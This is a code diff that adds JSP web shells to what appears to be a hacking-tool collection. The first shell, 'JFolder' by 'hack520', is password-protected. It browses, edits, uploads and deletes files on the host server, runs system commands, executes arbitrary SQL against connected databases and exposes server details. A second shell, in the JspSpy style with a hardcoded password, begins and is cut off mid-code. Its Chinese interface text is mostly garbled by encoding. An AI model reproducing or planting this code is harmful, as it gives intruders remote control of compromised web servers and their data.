+ sRet = "\n"; + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + + if (curFile != null) { + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + } + + sRet += "\n"; + + sRet += " \n"; + + for (n = 0; n < files.length; n ++) { + sRet += " \n"; + + if (! isRoot) { + sRet += " \n"; + if (files[n].isDirectory()) { + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + } + sRet += " \n"; + sRet += "
    \n"; + sRet += "  ϼĿ¼ "; + sRet += "Ŀ¼ "; + sRet += "½ļ "; + sRet += "ɾ "; + sRet += " "; + sRet += " "; + sRet += "ϴļ\n"; + sRet += " \n"; + sRet += "
    <" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
    \n"; + } + } catch (SecurityException e) { + sRet = "security violation, no privilege."; + } + + return sRet; +} + +public boolean isTextFile(String extName) { + int i; + boolean bRet = false; + + if (! extName.equals("")) { + for (i = 0; i < _textFileTypes.length; i ++) { + if (extName.equals(_textFileTypes[i])) { + bRet = true; + break; + } + } + } else { + bRet = true; + } + + return bRet; +} + +public String getExtName(String fileName) { + String sRet = ""; + int nLastDotPos; + + fileName = pathConvert(fileName); + + nLastDotPos = fileName.lastIndexOf("."); + + if (nLastDotPos == -1) { + sRet = ""; + } else { + sRet = fileName.substring(nLastDotPos + 1); + } + + return sRet; +} + +public String browseFile(String path) { + String sRet = ""; + File file = null; + FileReader fileReader = null; + + path = pathConvert(path); + + try { + file = new File(path); + fileReader = new FileReader(file); + String fileString = ""; + char[] chBuffer = new char[1024]; + int ret; + + sRet = "\n"; + + } catch (IOException e) { + sRet += "\n"; + } + + return sRet; +} + +public String openFile(String path, String curUri) { + String sRet = ""; + boolean canOpen = false; + int nLastDotPos = path.lastIndexOf("."); + String extName = ""; + String fileString = null; + File curFile = null; + + path = pathConvert(path); + + if (nLastDotPos == -1) { + canOpen = true; + } else { + extName = path.substring(nLastDotPos + 1); + canOpen = isTextFile(extName); + } + + if (canOpen) { + try { + fileString = ""; + curFile = new File(path); + FileReader fileReader = new FileReader(curFile); + char[] chBuffer = new char[1024]; + int nRet; + + while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { + fileString += new String(chBuffer, 0, nRet); + } + + fileReader.close(); + } catch (IOException e) { + fileString = null; + sRet = "ܴļ\"" + path + "\""; + } catch (SecurityException e) { + fileString = null; + sRet = "ȫ⣬ûȨִиò"; + } + } else { + sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; + } + + if (fileString != null) { + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += "
    [ϼĿ¼]
    \n"; + sRet += " \n"; + sRet += "
     
    \n"; + } + + return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path); + + if (! file.canWrite()) { + sRet = "ļд"; + } else { + FileWriter fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + + fileWriter.close(); + sRet = "ļɹڷأԺ򡭡\n"; + sRet += "\n"; + } + } catch (IOException e) { + sRet = "ļʧ"; + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { + String sRet = ""; + File folder = null; + + path = pathConvert(path); + + try { + folder = new File(path + folderName); + + if (folder.exists() && folder.isDirectory()) { + sRet = "\"" + path + folderName + "\"Ŀ¼Ѿ"; + } else { + if (folder.mkdir()) { + sRet = "ɹĿ¼\"" + pathConvert(folder.getPath()) + "\"ڷأԺ򡭡\n"; + sRet += ""; + } else { + sRet = "Ŀ¼\"" + folderName + "\"ʧ"; + } + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFile(String path, String curUri, String fileName) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path + fileName); + + if (file.createNewFile()) { + sRet = ""; + } else { + sRet = "\"" + path + fileName + "\"ļѾ"; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } catch (IOException e) { + sRet = "ļ\"" + path + fileName + "\"ʧ"; + } + + return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { + String sRet = ""; + File tmpFile = null; + + try { + for (int i = 0; i < files2Delete.length; i ++) { + tmpFile = new File(files2Delete[i]); + if (! tmpFile.delete()) { + sRet += "ɾ\"" + files2Delete[i] + "\"ʧ
    \n"; + } + } + + if (sRet.equals("")) { + sRet = "ɾɹڷأԺ򡭡\n"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò\n"; + } + + return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + FileWriter fileWriter = null; + + try { + file = new File(path); + + if (file.createNewFile()) { + fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + fileWriter.close(); + + sRet = ""; + } else { + sRet = "ļ\"" + path + "\"Ѿ"; + } + } catch (IOException e) { + sRet = "ļ\"" + path + "\"ʧ"; + } + + return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { + String sRet = ""; + File file = null; + InputStream in = null; + + path = pathConvert(path); + + try { + in = request.getInputStream(); + + byte[] inBytes = new byte[request.getContentLength()]; + int nBytes; + int start = 0; + int end = 0; + int size = 1024; + String token = null; + String filePath = null; + + // + // һֽ + // + while ((nBytes = in.read(inBytes, start, size)) != -1) { + start += nBytes; + } + + in.close(); + // + // ֽеõļָ + // + int i = 0; + byte[] seperator; + + while (inBytes[i] != 13) { + i ++; + } + + seperator = new byte[i]; + + for (i = 0; i < seperator.length; i ++) { + seperator[i] = inBytes[i]; + } + + // + // õHeader + // + String dataHeader = null; + i += 3; + start = i; + while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { + i ++; + } + end = i - 1; + dataHeader = new String(inBytes, start, end - start + 1); + + // + // õļ + // + token = "filename=\""; + start = dataHeader.indexOf(token) + token.length(); + token = "\""; + end = dataHeader.indexOf(token, start) - 1; + filePath = dataHeader.substring(start, end + 1); + filePath = pathConvert(filePath); + String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + + // + // õļݿʼλ + // + i += 4; + start = i; + + /* + boolean found = true; + byte[] tmp = new byte[seperator.length]; + while (i <= inBytes.length - 1 - seperator.length) { + + for (int j = i; j < i + seperator.length; j ++) { + if (seperator[j - i] != inBytes[j]) { + found = false; + break; + } else + tmp[j - i] = inBytes[j]; + } + + if (found) + break; + + i ++; + }*/ + + // + // ͵İ취 + // + end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + + // + // Ϊļ + // + File newFile = new File(path + fileName); + newFile.createNewFile(); + FileOutputStream out = new FileOutputStream(newFile); + + //out.write(inBytes, start, end - start + 1); + out.write(inBytes, start, end - start + 1); + out.close(); + + sRet = "\n"; + } catch (IOException e) { + sRet = "\n"; + } + + sRet += ""; + return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} + +public String getFileNameByPath(String path) { + String sRet = ""; + + path = pathConvert(path); + + if (path.lastIndexOf("/") != -1) { + sRet = path.substring(path.lastIndexOf("/") + 1); + } else { + sRet = path; + } + + return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { + String sRet = ""; + int i; + + path = pathConvert(path); + dstPath = pathConvert(dstPath); + + for (i = 0; i < files2Copy.length; i ++) { + if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { + sRet += "ļ\"" + files2Copy[i] + "\"ʧ
    "; + } + } + + if (sRet.equals("")) { + sRet = "ļƳɹڷأԺ򡭡"; + sRet += ""; + } + + return sRet; +} + +public boolean isFileName(String fileName) { + boolean bRet = false; + + Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); + Matcher m = p.matcher(fileName); + + bRet = m.matches(); + + return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { + String sRet = ""; + + path = pathConvert(path); + file2Rename = pathConvert(file2Rename); + + try { + File file = new File(file2Rename); + + newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; + File newFile = new File(newName); + + if (! file.exists()) { + sRet = "ļ\"" + file2Rename + "\""; + } else { + file.renameTo(newFile); + sRet = "ļɹڷأԺ򡭡"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⵼ļ\"" + file2Rename + "\"ʧ"; + } + + return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { + boolean bRet = true; + String driverName = ""; + + if (dbServer.equals("")) + dbServer = "localhost"; + + try { + if (dbType.equals("sqlserver")) { + driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; + if (dbPort.equals("")) + dbPort = "1433"; + _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("mysql")) { + driverName = "com.mysql.jdbc.Driver"; + if (dbPort.equals("")) + dbPort = "3306"; + _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("odbc")) { + driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; + _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; + } else if (dbType.equals("oracle")) { + driverName = "oracle.jdbc.driver.OracleDriver"; + _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; + } else if (dbType.equals("db2")) { + driverName = "com.ibm.db2.jdbc.app.DB2Driver"; + _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; + } + + Class.forName(driverName); + } catch (ClassNotFoundException e) { + bRet = false; + } + + return bRet; +} + +public boolean DBConnect(String User, String Password) { + boolean bRet = false; + + if (_url != null) { + try { + _dbConnection = DriverManager.getConnection(_url, User, Password); + _dbStatement = _dbConnection.createStatement(); + bRet = true; + } catch (SQLException e) { + bRet = false; + } + } + + return bRet; +} + +public String DBExecute(String sql) { + String sRet = ""; + + if (_dbConnection == null || _dbStatement == null) { + sRet = "ݿû"; + } else { + try { + if (sql.toLowerCase().substring(0, 6).equals("select")) { + ResultSet rs = _dbStatement.executeQuery(sql); + ResultSetMetaData rsmd = rs.getMetaData(); + int colNum = rsmd.getColumnCount(); + int colType; + + sRet = "sqlִгɹؽ
    \n"; + sRet += "\n"; + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + sRet += " \n"; + } + sRet += " \n"; + while (rs.next()) { + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + colType = rsmd.getColumnType(i); + + sRet += " \n"; + } + sRet += " \n"; + } + sRet += "
    " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
    "; + switch (colType) { + case Types.BIGINT: + sRet += rs.getLong(i); + break; + + case Types.BIT: + sRet += rs.getBoolean(i); + break; + + case Types.BOOLEAN: + sRet += rs.getBoolean(i); + break; + + case Types.CHAR: + sRet += rs.getString(i); + break; + + case Types.DATE: + sRet += rs.getDate(i).toString(); + break; + + case Types.DECIMAL: + sRet += rs.getDouble(i); + break; + + case Types.NUMERIC: + sRet += rs.getDouble(i); + break; + + case Types.REAL: + sRet += rs.getDouble(i); + break; + + case Types.DOUBLE: + sRet += rs.getDouble(i); + break; + + case Types.FLOAT: + sRet += rs.getFloat(i); + break; + + case Types.INTEGER: + sRet += rs.getInt(i); + break; + + case Types.TINYINT: + sRet += rs.getShort(i); + break; + + case Types.VARCHAR: + sRet += rs.getString(i); + break; + + case Types.TIME: + sRet += rs.getTime(i).toString(); + break; + + case Types.DATALINK: + sRet += rs.getTimestamp(i).toString(); + break; + } + sRet += "
    \n"; + + rs.close(); + } else { + if (_dbStatement.execute(sql)) { + sRet = "sqlִгɹ"; + } else { + sRet = "sqlִʧ"; + } + } + } catch (SQLException e) { + sRet = "sqlִʧ"; + } + } + + return sRet; +} + +public void DBRelease() { + try { + if (_dbStatement != null) { + _dbStatement.close(); + _dbStatement = null; + } + + if (_dbConnection != null) { + _dbConnection.close(); + _dbConnection = null; + } + } catch (SQLException e) { + + } +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { + private String _jshellContent = null; + private String _path = null; + + public JshellConfig(String path) throws JshellConfigException { + _path = path; + read(); + } + + private void read() throws JshellConfigException { + try { + FileReader jshell = new FileReader(new File(_path)); + char[] buffer = new char[1024]; + int nChars; + _jshellContent = ""; + + while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { + _jshellContent += new String(buffer, 0, nChars); + } + + jshell.close(); + } catch (IOException e) { + throw new JshellConfigException("ļʧ"); + } + } + + public void save() throws JshellConfigException { + FileWriter jshell = null; + + try { + jshell = new FileWriter(new File(_path)); + char[] buffer = _jshellContent.toCharArray(); + int start = 0; + int size = 1024; + + for (start = 0; start < buffer.length - 1 - size; start += size) { + jshell.write(buffer, start, size); + } + + jshell.write(buffer, start, buffer.length - 1 - start); + } catch (IOException e) { + new JshellConfigException("дļʧ"); + } finally { + try { + jshell.close(); + } catch (IOException e) { + + } + } + } + + public void setPassword(String password) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = p.matcher(password); + + if (! m.matches()) { + throw new JshellConfigException("벻гĸ»ַ"); + } + + p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); + m = p.matcher(_jshellContent); + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + + //return HTMLEncode(_jshellContent); + } + + public void setEncodeType(String encodeType) throws JshellConfigException { + Pattern p = Pattern.compile("[A-Za-z0-9]+"); + Matcher m = p.matcher(encodeType); + + if (! m.matches()) { + throw new JshellConfigException("ʽֻĸֵ"); + } + + p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); + //return HTMLEncode(_jshellContent); + } + + public void setSessionTime(String sessionTime) throws JshellConfigException { + Pattern p = Pattern.compile("\\d+"); + Matcher m = p.matcher(sessionTime); + + if (! m.matches()) { + throw new JshellConfigException("sessionʱʱֻ"); + } + + p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); + //return HTMLEncode(_jshellContent); + } + + public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = null; + int i; + String fileTypes = ""; + String tmpFileTypes = ""; + + for (i = 0; i < textFileTypes.length; i ++) { + m = p.matcher(textFileTypes[i]); + + if (! m.matches()) { + throw new JshellConfigException("չֻĸֺ»ߵ"); + } + + if (i != textFileTypes.length - 1) + fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; + else + fileTypes += "\"" + textFileTypes[i] + "\""; + } + + for (i = 0; i < _textFileTypes.length; i ++) { + if (i != _textFileTypes.length - 1) + tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; + else + tmpFileTypes += "\"" + _textFileTypes[i] + "\""; + } + + p = Pattern.compile(tmpFileTypes); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ļѾǷ޸"); + } + + _jshellContent = m.replaceAll(fileTypes); + + //return HTMLEncode(_jshellContent); + } + + public String getContent() { + return HTMLEncode(_jshellContent); + } +} + +class JshellConfigException extends Exception { + public JshellConfigException(String message) { + super(message); + } +} +%> + + +JFolder ͷ޸İ + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> +
    + + + + +
    + + + + + + + + + + + + + + + +
     8¼ :::...JFolder_By_hack520
    + + +
    +
    +<% +//================================================================================================ +// end of the login form +} else { + String password = null; + + if (session.getAttribute("password") == null) { + password = (String)request.getParameter("password"); + + if (validate(password) == false) { + out.println("
  • ѽù!
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } + + String action = null; + + + if (request.getParameter("action") == null) + action = "main"; + else + action = (String)request.getParameter("action"); + + if (action.equals("exit")) { + session.removeAttribute("password"); + response.sendRedirect(request.getRequestURI()); + out.close(); + return; + } + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + + if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Ϣ
    <%=request.getServerName()%>
    ˿<%=request.getServerPort()%>
    ϵͳ<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    ǰû<%=System.getProperty("user.name")%>
    ǰûĿ¼<%=System.getProperty("user.home")%>
    ǰûĿ¼<%=System.getProperty("user.dir")%>
    ·<%=request.getRequestURI()%>
    ·<%=request.getRealPath(request.getServletPath())%>
    Э<%=request.getProtocol()%>
    汾Ϣ<%=application.getServerInfo()%>
    JDK汾<%=System.getProperty("java.version")%>
    JDKװ·<%=System.getProperty("java.home")%>
    JAVA汾<%=System.getProperty("java.vm.specification.version")%>
    JAVA<%=System.getProperty("java.vm.name")%>
    JAVA·<%=System.getProperty("java.class.path")%>
    JAVA·<%=System.getProperty("java.library.path")%>
    JAVAʱĿ¼<%=System.getProperty("java.io.tmpdir")%>
    JIT<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    չĿ¼·<%=System.getProperty("java.ext.dirs")%>
    ͻϢ
    ͻַ<%=request.getRemoteAddr()%>
    <%=request.getRemoteHost()%>
    û<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    ʽ<%=request.getScheme()%>
    Ӧðȫ׽ֲ<%=request.isSecure() == true ? "" : ""%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("filesystem")) { + String curPath = ""; + String result = ""; + String fsAction = ""; + + if (request.getParameter("curPath") == null) { + curPath = request.getRealPath(request.getServletPath()); + curPath = pathConvert((new File(curPath)).getParent()); + } else { + curPath = Unicode2GB((String)request.getParameter("curPath")); + } + + if (request.getParameter("fsAction") == null) { + fsAction = "list"; + } else { + fsAction = (String)request.getParameter("fsAction"); + } + + if (fsAction.equals("list")) + result = listFiles(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("browse")) { + result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); + result += browseFile(curPath); + } + else if (fsAction.equals("open")) + result = openFile(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("save")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB((String)request.getParameter("fileContent")); + result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("createFolder")) { + if (request.getParameter("folderName") == null) { + result = "Ŀ¼Ϊ"; + } else { + String folderName = Unicode2GB(request.getParameter("folderName").trim()); + if (folderName.equals("")) { + result = "Ŀ¼Ϊ"; + } else { + result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); + } + } + } else if (fsAction.equals("createFile")) { + if (request.getParameter("fileName") == null) { + result = "ļΪ"; + } else { + String fileName = Unicode2GB(request.getParameter("fileName").trim()); + if (fileName.equals("")) { + result = "ļΪ"; + } else { + result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); + } + } + } else if (fsAction.equals("deleteFile")) { + if (request.getParameter("filesDelete") == null) { + result = "ûѡҪɾļ"; + } else { + String[] files2Delete = (String[])request.getParameterValues("filesDelete"); + if (files2Delete.length == 0) { + result = "ûѡҪɾļ"; + } else { + for (int n = 0; n < files2Delete.length; n ++) { + files2Delete[n] = Unicode2GB(files2Delete[n]); + } + result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); + } + } + } else if (fsAction.equals("saveAs")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB(request.getParameter("fileContent")); + result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("upload")) { + result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); + } else if (fsAction.equals("copyto")) { + if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { + result = "ûѡҪƵļ"; + } else { + String[] files2Copy = request.getParameterValues("filesDelete"); + String dstPath = request.getParameter("dstPath").trim(); + if (files2Copy.length == 0) { + result = "ûѡҪƵļ"; + } else if (dstPath.equals("")) { + result = "ûдҪƵĿ¼·"; + } else { + for (int i = 0; i < files2Copy.length; i ++) + files2Copy[i] = Unicode2GB(files2Copy[i]); + + result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); + } + } + } else if (fsAction.equals("rename")) { + if (request.getParameter("fileRename") == null) { + result = "ҳ浼"; + } else { + String file2Rename = request.getParameter("fileRename").trim(); + String newName = request.getParameter("newName").trim(); + if (file2Rename.equals("")) { + result = "ûѡҪļ"; + } else if (newName.equals("")) { + result = "ûдļ"; + } else { + result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); + } + } + } +%> + + + + + + + + + +
    ַ   +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("command")) { + String cmd = ""; + InputStream ins = null; + String result = ""; + + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command"); + result = exeCmd(cmd); + } +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    ִ
    + + +
    ִн
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("database")) { + String dbAction = ""; + String result = ""; + String dbType = ""; + String dbServer = ""; + String dbPort = ""; + String dbUsername = ""; + String dbPassword = ""; + String dbName = ""; + String dbResult = ""; + String sql = ""; + + if (request.getParameter("dbAction") == null) { + dbAction = "main"; + } else { + dbAction = request.getParameter("dbAction").trim(); + if (dbAction.equals("")) + dbAction = "main"; + } + + if (dbAction.equals("main")) { + result = " "; + } else if (dbAction.equals("dbConnect")) { + if (request.getParameter("dbType") == null || + request.getParameter("dbServer") == null || + request.getParameter("dbPort") == null || + request.getParameter("dbUsername") == null || + request.getParameter("dbPassword") == null || + request.getParameter("dbName") == null) { + response.sendRedirect(request.getRequestURI() + "?action=" + action); + } else { + dbType = request.getParameter("dbType").trim(); + dbServer = request.getParameter("dbServer").trim(); + dbPort = request.getParameter("dbPort").trim(); + dbUsername = request.getParameter("dbUsername").trim(); + dbPassword = request.getParameter("dbPassword").trim(); + dbName = request.getParameter("dbName").trim(); + + if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { + if (DBConnect(dbUsername, dbPassword)) { + if (request.getParameter("sql") != null) { + sql = request.getParameter("sql").trim(); + if (! sql.equals("")) { + dbResult = DBExecute(sql); + } + } + + result = "\n"; + result += "sql

     \n"; + + DBRelease(); + } else { + result = "ݿʧ"; + } + } else { + result = "ݿûҵ"; + } + } + } +%> + + + "> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    ݿ + + +
    ݿַ
    ݿ˿
    ݿû
    ݿ
    ݿ
     
    <%=result%>
    + + + + +
    + <%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("config")) { + String cfAction = ""; + int i; + + if (request.getParameter("cfAction") == null) { + + cfAction = "main"; + } else { + cfAction = request.getParameter("cfAction").trim(); + if (cfAction.equals("")) + cfAction = "main"; + } + + if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + + " onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    ϵͳ
    Sessionʱʱ
    ɱ༭ļ + + + + + + +
    + + + +

    + +     		+ +
    +
    +<% + } else if (cfAction.equals("save")) { + if (request.getParameter("password") == null || + request.getParameter("encode") == null || + request.getParameter("sessionTime") == null || + request.getParameterValues("textFileTypes") == null) { + response.sendRedirect(request.getRequestURI()); + } + + String result = ""; + + String newPassword = request.getParameter("password").trim(); + String newEncodeType = request.getParameter("encode").trim(); + String newSessionTime = request.getParameter("sessionTime").trim(); + String[] newTextFileTypes = request.getParameterValues("textFileTypes"); + String jshellPath = request.getRealPath(request.getServletPath()); + + try { + JshellConfig jconfig = new JshellConfig(jshellPath); + jconfig.setPassword(newPassword); + jconfig.setEncodeType(newEncodeType); + jconfig.setSessionTime(newSessionTime); + jconfig.setTextFileTypes(newTextFileTypes); + jconfig.save(); + result += "ñɹڷأԺ򡭡"; + result += ""; + } catch (JshellConfigException e) { + result = "" + e.getMessage() + ""; + } + +%> + + + + +
    <%=result == "" ? " " : result%>
    +<% + } +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form + } else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
    jshell ver 0.1
        ʾalxeaĹܣҲȽϷЩȨǹߵ.
    hack520 by hack520 and welcome to ĺڿͬ
    +<% +//========================================================================================== + } +} +%> + + diff --git a/jsp/hackk8/fuck-jsp/jspbrowser/1.jsp b/jsp/hackk8/fuck-jsp/jspbrowser/1.jsp new file mode 100644 index 0000000..ccdfb25 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/jspbrowser/1.jsp @@ -0,0 +1,2344 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By Ninty +* Date 2009-12-17 +* Blog http://www.Forjj.com/ +* Yue . I Love You. +*/ +private static final String PW = "kity"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; 